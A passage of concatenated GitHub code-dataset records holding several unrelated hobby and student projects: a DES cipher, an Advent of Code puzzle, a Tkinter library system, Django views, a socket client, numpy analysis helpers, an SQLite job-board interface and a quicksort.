k): #encryption given message, key\n if str.isdecimal(m) == False:\n c = chunk(m)\n else:\n c = chop(m)\n key = Key(k)\n encrypt = \"\"\n for i in range(len(c)):\n math = Mafs(c[i], key)\n encrypt = encrypt + math.getFP()\n return encrypt\n\ndef unDES(m, k): #decryption given ciphertext (in binary or alpha), key\n key = Key(k)\n if str.isdecimal(m) == False:\n c = chunk(m)\n else:\n c = chop(m)\n key.invert()\n decrypt = \"\"\n for i in range(len(c)):\n math = Mafs(c[i], key)\n decrypt = decrypt + math.getFP()\n return decrypt\n\ndef DES3(m, k1, k2): #triple DES encryption\n return DES(unDES(DES(m, k1), k2), k1)\n\ndef unDES3(m, k1, k2): #triple DES decryption\n return unDES(DES(unDES(m, k1), k2), k1)\n\ndef chop(x): #splits binary string into list of 64 bit chunks\n split = []\n while x != \"\":\n s = \"\"\n for i in range(64):\n if x != \"\":\n s = s + x[0]\n x = x[1:]\n split.append(s)\n return split\n\ndef option1(e, i): #user menu A\n x = 'a'\n end 
= False\n while x == 'a':\n print(\"Do you wish to (d)ecipher, (r)estart, or (q)uit?\")\n x = input()\n if x == 'd':\n print(\"Decrypting....\")\n if i.isSingle():\n d = unDES(e, i.getK1())\n else:\n d = unDES3(e, i.getK1(), i.getK2())\n print(\"Deciphered: \" + toChar(d))\n elif x == 'r':\n break\n elif x == 'q':\n sys.exit(0)\n else:\n print(\"Invalid input, try again\")\n x = 'a'\n return end\n\ndef option2(): #user menu B\n x = 'a'\n end = False\n while x == 'a':\n print(\"Do you wish to (r)estart, or (q)uit?\")\n x = input()\n if x == 'r':\n break\n elif x == 'q':\n sys.exit(0)\n else:\n print(\"Invalid input, try again\")\n x = 'a'\n return end\n\nif __name__ == '__main__':\n main()\n","repo_name":"KaiFish/DES","sub_path":"DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28881666085","text":"import math\nimport numpy as np\n\ndef parse_input():\n dots, folds = open('Day13/puzzle_input.txt', 'r').read().split('\\n\\n')\n dots = set(tuple(int(i) for i in line.split(',')) for line in dots.split('\\n'))\n folds = [tuple((line.split('=')[0][-1], int(line.split('=')[1]))) for line in folds.split('\\n')]\n return dots, folds\n\ndef fold(dots, instruction):\n folded_dots = set()\n for dot in dots:\n if instruction[0] == 'x':\n if dot[0] > instruction[1]:\n new_dot = (2*instruction[1]-dot[0], dot[1])\n folded_dots.add(new_dot)\n else:\n folded_dots.add(dot)\n elif instruction[0] == 'y':\n if dot[1] > instruction[1]:\n new_dot = (dot[0], 2*instruction[1]-dot[1])\n folded_dots.add(new_dot)\n else:\n folded_dots.add(dot)\n return folded_dots\n\ndots, instructions = parse_input()\n\ndef fold_all(dots, instructions):\n for inst in instructions:\n dots = fold(dots, inst)\n return dots\n\ndef paper_print(dots):\n for i in range(max([y for x, y in dots]) + 1):\n print(''.join('#' if (j, i) in dots else ' ' for j in range(max([x for x, y in dots]) + 1)))\n\nprint(paper_print(fold_all(dots, instructions)))\n\n","repo_name":"Mechoj08/AdventOfCode21","sub_path":"Day13/day_13_1.py","file_name":"day_13_1.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27667991711","text":"import csv\nfrom tkinter import *\nfrom collections import Counter\nfrom matplotlib import pyplot as plt \nmylist = []\nfor i in range(1000,10000):\n mylist.append(i)\nmynewlist = mylist\nmylist2 = ['Book_1', 'Book_2', 'Book_1', 'Book_2', 'Book_2', 'Book_3', 'Book_1', 'Book_3', 'Book_4', 'Book_4']\nmylist3 = ['1','2','3','4','5','6','7','8','9','10']\ndata = open('database.txt', encoding = 'utf-8')\ncsv_data = csv.reader(data)\ndata_lines = list(csv_data)\nroot = Tk()\nroot.title(\"Library Management System\")\nmy_listbox = Listbox(root, bg = 'lawn green', height = 10, width = 60)\nmy_listbox.grid(row = 20, column = 1)\n\n#Above are all the global variables and value, a listbox is used to display all the ouputs\n\n\n#below is the first entry widget where you should enter the Book title you want to search up\n\nBooksearchinput = Label(root, text = 'Please enter Book Title:')\nBooksearchinput.grid(row = 0,column = 0) \n \nBookTitle = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Book Title\nBookTitle.grid(row = 1 , column=0 ) \n\n\n# below is the function used to search for books\n\ndef search_for_books():\n with open('database.txt', 'r') as big_file:\n big_reader = 
csv.reader(big_file)\n for line in big_reader:\n if BookTitle.get() in line:\n global output\n my_listbox.insert(END, line)\n \n \n if BookTitle.get() not in mylist2:\n my_listbox.insert(END, \"Invalid\")\n\nSearchButton = Button(root, text = \"Search\", padx = 5, pady = 5,command = search_for_books,fg='red')\n\n\nSearchButton.grid(row = 2, column = 0) \n\n#after input is put, press the search button to get back the books with that title\n\n\n\n# BEFORE CHECKING OUT A BOOK, ALWAYS SEARCH FOR THE BOOK WITH THE SEARCH BUTTON AS THE DETAILS ARE IMPORTANT TO FILL IN AND CHECK THE AVAILABILITY OF THE BOOK \n\n\n#below, are the entries required for a book checkout. First enter Book title, Serial no of book, do you want to checkout(Yes or No), ISBN, MEMBER ID, today's date\n#All the boxes have specification above them about what to do.\n#please fill in all the boxes then press the checkout button\n\nBookCheckoutBooktitle = Label(root, text = 'Please enter Book Title: ')\nBookCheckoutBooktitle.grid(row = 0, column = 1)\n\nBooktitle2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Book Title\nBooktitle2.grid(row = 1, column = 1)\n\nBookCheckoutSerialNumber = Label(root, text = 'Please enter Serial number of book: ')\nBookCheckoutSerialNumber.grid(row = 2, column = 1)\n\n\nBookSerial = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Please enter serial number of book which has 0 under ID column\nBookSerial.grid(row = 3, column = 1)\n\nBookCheckoutDoyouCheckout= Label(root, text = 'Do you want to checkout? (Yes or No): ')\nBookCheckoutDoyouCheckout.grid(row = 4, column = 1)\n\n\nCheckoutresponse = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Do you want to checkout?\nCheckoutresponse.grid(row = 5, column = 1)\n\nBookCheckoutISBN = Label(root, text = \"Please enter ISBN: \")\nBookCheckoutISBN.grid(row = 6, column = 1)\n\nISBN = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #ISBN\nISBN.grid(row = 7, column = 1)\n\nBookCheckoutMemberID = Label(root, text = \"Please enter Member's ID: \")\nBookCheckoutMemberID.grid(row = 8, column = 1) \n\nMemberID = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Member ID\nMemberID.grid(row = 9, column = 1)\n\nBookCheckoutDate = Label(root, text = \"Please enter present Date: \")\nBookCheckoutDate.grid(row = 10, column = 1) \n\n\nCheckoutDate = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Checkout Date\nCheckoutDate.grid(row = 11, column = 1)\n\n#below is the book checkout function as explained in the bookcheckout.py file\n \n\ndef book_checkout(): \n \n \n if Booktitle2.get() not in mylist2:\n error2 = \"Not valid\"\n print(error2)\n output3 = Label(root, text = error2)\n output3.pack()\n with open('database.txt', 'r') as big_file:\n big_reader = csv.reader(big_file)\n for line in big_reader:\n if Booktitle2.get() in line:\n my_listbox.insert(END, line)\n #(Please enter serial number of book which has 0 under ID column)\n\n \n\n \n if BookSerial.get() in mylist3:\n if Booktitle2.get() == 'Book_1' and BookSerial.get() == mylist3[0]:\n if data_lines[1][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_2' and BookSerial.get() ==mylist3[1]:\n if data_lines[2][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n \n elif Booktitle2.get() == 'Book_1' and 
BookSerial.get() ==mylist3[2]:\n if data_lines[3][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n \n elif Booktitle2.get() =='Book_2' and BookSerial.get() ==mylist3[3]:\n if data_lines[4][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n \n elif Booktitle2.get() =='Book_2' and BookSerial.get() ==mylist3[4]:\n if data_lines[5][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_3' and BookSerial.get() ==mylist3[5]:\n if data_lines[6][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() == 'Book_1' and BookSerial.get() ==mylist3[6]:\n if data_lines[7][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n if Booktitle2.get() =='Book_3' and BookSerial.get() ==mylist3[7]:\n if data_lines[8][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_4' and BookSerial.get() ==mylist3[8]:\n if data_lines[9][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n elif Booktitle2.get() =='Book_4' and BookSerial.get() ==mylist3[9]:\n if data_lines[10][5] == '0':\n my_listbox.insert(END, \"Book is available\")\n \n else:\n my_listbox.insert(END, \"Book is not available at this time\")\n \n else:\n my_listbox.insert(END, \"\")\n \n \n if BookSerial.get() not in mylist3:\n my_listbox.insert(END, \"Entry not valid\") \n \n if Booktitle2.get() not in mylist2 :\n my_listbox.insert(END, \"Invalid!\") \n \n \n\n if Checkoutresponse.get() == 'Yes':\n my_listbox.insert(END, \"ISBN Please\")\n \n with open('database.txt', 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n for line in csv_reader:\n if ISBN.get() in line and int(MemberID.get())in mynewlist:\n my_listbox.insert(END, \"Book Withdrawn successfully!\")\n \n \n if ISBN.get() == '9783161484100' and BookSerial.get() == '1':\n data_lines[1][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484105' and BookSerial.get() == '2':\n data_lines[2][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484100' and BookSerial.get() == '3':\n data_lines[3][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484105' and BookSerial.get() == '4':\n data_lines[4][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484105' and BookSerial.get() == '5':\n data_lines[5][5]= ('%d'%(int(MemberID.get())))\n \n with 
open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484110' and BookSerial.get() == '6':\n data_lines[6][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484100' and BookSerial.get() == '7':\n data_lines[7][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484110' and BookSerial.get() == '8':\n data_lines[8][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484200' and BookSerial.get() == '9':\n data_lines[9][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n if ISBN.get() == '9783161484200' and BookSerial.get() == '10':\n data_lines[10][5]= ('%d'%(int(MemberID.get())))\n \n with open('database.txt',mode = 'w') as csv2_FILE:\n writerow = csv.writer(csv2_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csv2_FILE.close\n \n \n my_listbox.insert(END, \"Thank You\")\n my_listbox.insert(END, (\"ID : %s , Book Title : %s, Member ID : %s, ISBN : %s, Checkout Date : %s\" %(BookSerial.get(),Booktitle2.get(),MemberID.get(),ISBN.get(),CheckoutDate.get())))\n my_listbox.insert(END, \"Please remember this information while returning your book\")\n \n \n break\n \n \n \n \n \n elif ISBN.get() not in line and int(MemberID.get()) not in mynewlist:\n my_listbox.insert(END, \"Invalid!\")\n \n break\n elif Checkoutresponse.get() == 'No':\n my_listbox.insert(END, \"Bye\")\n \n\n#After all the inputs are put in their respective boxes, only then click the checkout button\n \nCheckout_button = Button(root, text = \"Checkout\", padx = 5, pady = 5, command = book_checkout,fg='red')\n\nCheckout_button.grid(row = 12, column = 1)\n\n\n\n\n\n#below, are the entries required for a book return. 
First enter Do you want to return a book(Yes or NO) , ISBN, MEMBER ID, today's date, Serial number of book, checkout date\n#All the boxes have specification above them about what to do.\n#please fill in all the boxes then press the return button\n\nBookReturnDoyouwanttoreturn = Label(root, text = \"Do you want to return a book?(Yes or No): \")\nBookReturnDoyouwanttoreturn.grid(row = 4, column = 0)\n\nReturnresponse = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Do you wish to return a book?\nReturnresponse.grid(row = 5, column = 0)\n\nBookReturnMemberID = Label(root, text = \"Please enter Member's ID: \")\nBookReturnMemberID.grid(row = 6, column = 0)\n\nMemberID2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Member ID\nMemberID2.grid(row = 7, column = 0)\n\nBookReturnISBN = Label(root, text = \"Please enter ISBN: \")\nBookReturnISBN.grid(row = 8, column = 0) \n \n\nISBN2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #ISBN\nISBN2.grid(row = 9, column = 0)\n\nBookReturnBooktitle = Label(root, text = \"Please enter Book Title: \")\nBookReturnBooktitle.grid(row = 10, column = 0) \n\nBooktitle3 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Book Title\nBooktitle3.grid(row = 11, column = 0)\n\nBookReturnTodayDate = Label(root, text = \"Please enter Today's Date: \")\nBookReturnTodayDate.grid(row = 12, column = 0)\n\nReturnDate = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Today's Date\nReturnDate.grid(row = 13, column = 0)\n\nBookReturnSerialNo = Label(root, text = \"Please enter Serial number of book: \")\nBookReturnSerialNo.grid(row = 14, column = 0)\n\nBookSerial2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Serial number of book taken\nBookSerial2.grid(row = 15, column = 0)\n\nBookReturnCheckoutDate = Label(root, text = \"Please enter checkout date: \")\nBookReturnCheckoutDate.grid(row = 16, column = 0)\n\nCheckoutDate2 = Entry(root,width = 50,bg = 'black', fg='white', borderwidth = 5) #Checkout Date\nCheckoutDate2.grid(row = 17, column = 0)\n\n\n#below is the book return function as explained in the bookreturn.py file\ndef book_return():\n \n if Returnresponse.get() == 'Yes':\n for i in range(0,11):\n if MemberID2.get() in data_lines[i][5]:\n \n my_listbox.insert(END, data_lines[i])\n \n my_listbox.insert(END, \"Valid\")\n \n \n\n \n \n if BookSerial2.get() in mylist3 and ISBN2.get() in data_lines[i][1]:\n if BookSerial2.get() =='1':\n data_lines[1][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='2':\n data_lines[2][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='3':\n data_lines[3][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='4':\n data_lines[4][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='5':\n data_lines[5][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if 
BookSerial2.get() =='6':\n data_lines[6][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='7':\n data_lines[7][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='8':\n data_lines[8][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='9':\n data_lines[9][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n if BookSerial2.get() =='10':\n data_lines[10][5]= '0'\n with open('database.txt',mode = 'w') as csvmy_FILE:\n writerow = csv.writer(csvmy_FILE, delimiter =',')\n writerow.writerows(data_lines)\n csvmy_FILE.close\n \n my_listbox.insert(END, \"Book returned successfully\") \n \n elif BookSerial2.get() not in mylist3:\n my_listbox.insert(END, \"Invalid!\")\n \n break\n \n with open(r'logfile.txt', 'a') as csvfile: \n newfile = csv.writer(csvfile)\n newfile.writerow([BookSerial2.get(),Booktitle3.get(),MemberID2.get(),ISBN2.get(),CheckoutDate2.get(),ReturnDate.get()])\n my_listbox.insert(END, \"Thank You! Have a great day.\")\n \n break\n else:\n my_listbox.insert(END, \"Not valid!\")\n \n else:\n my_listbox.insert(END, \"Have a good day\")\n \n \n \n \n#After all the inputs are put in the respective boxes, only then click the return button\n \nReturn_button = Button(root, text = \"Return\",padx = 5, pady = 5, command = book_return,fg='red')\nReturn_button.grid(row = 18, column = 0)\n\n\n#Below is the function for my weeding criteria, there is an obvious error where the graph is not embedded in the tkinter window, Apologies.\n\n\n\n\n \ndef book_weeding():\n plt.style.use(\"fivethirtyeight\")\nwith open('logfile.txt') as myoo_file:\n book_reader = csv.DictReader(myoo_file)\n book_counter = Counter()\n for row in book_reader:\n book_counter.update(row['Book Title'].split(';'))\nbooks = []\npopularity = []\nfor item in book_counter.most_common():\n books.append(item[0])\n popularity.append(item[1])\nbooks.reverse()\npopularity.reverse()\n \nplt.barh(books, popularity) \nplt.title(\"Book Weeding\")\nplt.xlabel(\"Number of times withdrawn\")\nplt.ylabel(\"BOOK TITLE\")\nplt.tight_layout()\nplt.show()\n\n\n\nWeeding_button = Button(root, text = \"Weeding\",padx = 5, pady = 5, command = book_weeding,fg='red')\nWeeding_button.grid(row = 20, column = 0)\n\nroot.configure(bg='cyan')\n\nroot.mainloop()\n\n\n# TO USE THE WINDOW, PLEASE EXIT FROM THE GRAPH FIRST\n","repo_name":"aym183/Library-System","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":23567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17902226479","text":"# -*- coding: utf-8 -*-\n# @Date: 2016-11-29 20:26:06\n# @Last Modified time: 2017-01-03 15:54:21\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.template.context_processors import csrf\n#\n# @method_decorator————给类视图添加装饰器\nfrom django.utils.decorators import method_decorator\n#\n\nfrom django.views.generic import ListView, View\n# from django.views.generic import TemplateView\nfrom 
login.common.security import create_pwd, create_session\nfrom login.forms import UserForm\nfrom login.models import SimpleUser, DownLoad\nfrom base.common.excelDownload import big_excel_download\n\n\nclass DownloadList(ListView):\n\n template_name = 'login/download_list.html'\n\n # model = DownLoad————queryset = DownLoad.objects.all()\n def get_queryset(self):\n list_d = DownLoad.objects.all()\n create_name = self.request.GET.get('create_name')\n file_name = self.request.GET.get('file_name')\n address = self.request.GET.get('address')\n if create_name:\n list_d = list_d.filter(create_name=create_name)\n if file_name:\n list_d = list_d.filter(file_name=file_name)\n if address:\n list_d = list_d.filter(address=address)\n return list_d\n\n # dispatch————类视图接受装饰器\n @method_decorator(csrf_protect)\n def dispatch(self, *args, **kwargs):\n return super(DownloadList, self).dispatch(*args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(DownloadList, self).get_context_data(**kwargs)\n # 在上下文数据中添加file_name集合\n # annotate = DownLoad.objects.values('file_name').annotate()\n # context['annotate'] = annotate\n return context\n\n # def get_object(self, queryset=None):\n # return get_object_or_404(Product, key=self.kwargs.get('name'))\n\n\n# excel导出视图\ndef report_excel(request):\n # 文件名必须unicode\n # 编码一律使用unicode,避免出错\n xlsxname = u\"下载信息表\"\n titles = [u\"文件名\", u\"创建人\", u\"下载地址\"]\n # 调用DownloadList的get_queryset方法\n d = DownloadList()\n d.__init__(request=request)\n data = d.get_queryset()\n data_fields = []\n for i in data:\n row = [i.file_name, i.create_name, i.address]\n data_fields.append(row)\n # response = excel_download(xlsxname, titles, data_fields)\n response = big_excel_download(xlsxname, titles, data_fields)\n return response\n\n\n# 基于类的表单处理视图\nclass AddDownload(View):\n\n @method_decorator(csrf_protect)\n def dispatch(self, request, *args, **kwargs):\n return super(AddDownload, self).dispatch(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n data = None\n # request.REQUEST————等于request.GET+request.POST,GET、POST更明确\n file_name = request.POST.get('file_name')\n create_name = request.POST.get('create_name')\n address = request.POST.get('address')\n if not file_name:\n data = \"文件名添必填\"\n if not create_name:\n data = \"添加人必填\"\n if not address:\n data = \"文件链接必填\"\n if not data:\n d = DownLoad(file_name=file_name,\n create_name=create_name, address=address)\n # save()————保存到数据库\n d.save()\n # 获取增加的这条数据的ID\n # id = d.id\n data = \"ok\"\n return HttpResponse(data)\n\n\n# from django.shortcuts import get_object_or_404\n# publisher = get_object_or_404(DownLoad, name__iexact=self.args[0])\n","repo_name":"cash2one/web-3","sub_path":"py_web_django/乱七八糟/azure/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26745714534","text":"#coding-utf-8\nimport socket\nimport msgpack\n\ndef rodar_rotinas():\n\n host='localhost'\n\n mysock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n addr=(host, 9898)\n mysock.connect(addr)\n\n try:\n # msg=b\"ola\\n\"\n msg = execution()\n mysock.sendall(msg)\n except socket.errno as e:\n print(\"Socket error \", e)\n finally:\n while True:\n msg = mysock.recv(1024)\n if not msg:\n break\n fallback(msgpack.unpackb(msg))\n mysock.close()\n\n\ndef execution():\n return msgpack.packb(['execute_test()', 'send_sms()', 'send_email()'])\n # fallback('ok')\n\ndef fallback(fallback):\n 
print(fallback)\n\n\nrodar_rotinas()\n","repo_name":"kauehmoreno/rpc","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31620492276","text":"# Erica Lei\n# CS251 Spring 2017\n# Project 4 Integrating Data and Viewing\n# due March 12\n\nimport data\nimport sys\nimport numpy as np\n\n\n# returns a list of 2-element lists with min and max for each col\ndef data_range(headers, data):\n\tselected = data.getNumCol(headers)\n\tmins = selected.min(0)\n\tminlist = [[mins[0,0]],[mins[0,1]]]\n\n\tmaxs = selected.max(0)\n\tmaxlist = [[maxs[0,0]],[maxs[0,1]]]\n\n\tminnmax = np.hstack((minlist, maxlist))\n\treturn minnmax\n\n# returns a list of the mean values for each column\ndef mean(headers, data):\n\n\treturn data.getNumCol(headers).mean(0)\n\n# returns a list of the standard deviation for each specified column\ndef stdev(headers, data):\n\tselected = data.getNumCol(headers)\n\tsdlist = []\n\tfor i in range(selected.shape[1]):\n\t\tcol = selected[:,i]\n\t\t\n\t\tsdlist.append(np.std(col))\n\treturn sdlist\n\n# returns a matrix with each column normalized\n# so its minimum value is mapped to 0 and \n# its maximum value is mapped to 1. (x-min)/(max-min)\ndef normalize_columns_separately(headers, data):\n\tselected = data.getNumCol(headers)\n\tminval = np.min(selected, axis = 0)\n\tmaxval = np.max(selected, axis = 1)\n\textent = maxval-minval\n\tresult= (selected-minval)/extent\n\n\treturn result\n\n# returns a matrix with each entry normalized \n# so that the minimum value (of all the data in this set of columns) \n# is mapped to 0 and its maximum value is mapped to 1.\ndef normalize_columns_together(headers, data):\n\tselected = data.getNumCol(headers)\n\textent = selected.max() - selected.min()\n\tr = (selected - selected.min())/extent\n\treturn r\n\n# returns the sums of each col\ndef sumCol(headers,data):\n\tselected = data.getNumCol(headers)\n\treturn np.sum(selected,axis = 0)\n\n# retuns a number, sum of all elements\ndef sumTotal(headers,data):\n\tselected = data.getNumCol(headers)\n\treturn np.sum(selected)\n\n# returns a list of 25 percent of the range of each col\ndef perc25(headers,data):\n\tselected = data.getNumCol(headers)\n\tpc = np.percentile(selected, 25, axis=0)\n\treturn pc\n\n","repo_name":"EricaLei98/CS251-Data-Analysis-and-Visualization","sub_path":"Lab4/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37057210923","text":"\"\"\"\nDatabase Model interface for the COMP249 Web Application assignment\n\n@author: steve cassidy\n\"\"\"\n\nimport datetime\n\n\ndef position_list(db, limit=10):\n \"\"\"Return a list of positions ordered by date\n db is a database connection\n return at most limit positions (default 10)\n\n Returns a list of tuples (id, timestamp, owner, title, location, company, description)\n \"\"\"\n\n \"\"\"Get the positions data from database\"\"\"\n cursor = db.cursor()\n cursor.execute(\"SELECT * from positions order by timestamp DESC\")\n result = cursor.fetchall()\n\n final_data = []\n\n \"\"\"Reformatting the job description to display only first 100 characters and adding Read More link\"\"\"\n for x in result:\n lst = list(x)\n desc = lst[6]\n desc = str(desc[0:100])\n desc = desc+\" ... 
Read More\"\n lst[6] = desc\n x = tuple(lst)\n\n final_data.append(x)\n\n my_result = []\n\n \"\"\"If limit is greater than records then return current list\"\"\"\n if limit > len(final_data):\n return result\n\n \"\"\"If limit is less than records then return only required records\"\"\"\n for count in range(0, limit):\n my_result.append(final_data[count])\n\n return my_result\n\n\ndef position_get(db, id):\n \"\"\"Return the details of the position with the given id\n or None if there is no position with this id\n\n Returns a tuple (id, timestamp, owner, title, location, company, description)\n\n \"\"\"\n \"\"\"Get the positions data from database\"\"\"\n position_data=[]\n cursor = db.cursor()\n cursor.execute(\"SELECT * from positions where id =(?)\", (id,))\n myresult = cursor.fetchall();\n\n \"\"\"Return required details of position\"\"\"\n for record in myresult:\n for data in record:\n position_data.append(data)\n\n \"\"\"Return None if no records are found\"\"\"\n if(len(position_data)==0):\n return None\n return position_data\n\n\ndef position_add(db, usernick, title, location, company, description):\n \"\"\"Add a new post to the database.\n The date of the post will be the current time and date.\n Only add the record if usernick matches an existing user\n\n Return True if the record was added, False if not.\"\"\"\n\n \"\"\"Get the users data from database\"\"\"\n cursor = db.cursor()\n cursor.execute(\"SELECT * FROM users where nick=(?)\", (usernick,))\n result = cursor.fetchall()\n\n \"\"\"Check if user exist if yes insert new position into the database and return true else return false\"\"\"\n if len(result) == 0:\n return False\n else:\n cursor.execute(\"INSERT INTO positions(timestamp,owner,title,location,company,description) VALUES(?,?,?,?,?,?)\",\n (str(datetime.datetime.now()),usernick,title,location,company,description,))\n\n db.commit()\n return True\n","repo_name":"palash-tayade/WebTechnology-Project","sub_path":"Assignment3_Level3/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70218103306","text":"# The Quick Sort Algorithm\n\narr = [3, -2, -1, 0, 2, 4, 1]\n\n# sorted in ascending order\n# [-2, -1, 0, 1, 2, 3, 4]\n\n\ndef qs(arr, l, r):\n if l >= r:\n return\n\n pivot = arr[r]\n i = l\n j = r - 1\n\n while i <= j:\n if arr[i] <= pivot:\n i += 1\n elif arr[j] > pivot:\n j -= 1\n else:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n j -= 1\n\n arr[i], arr[r] = arr[r], arr[i]\n\n qs(arr, l, i - 1)\n qs(arr, i + 1, 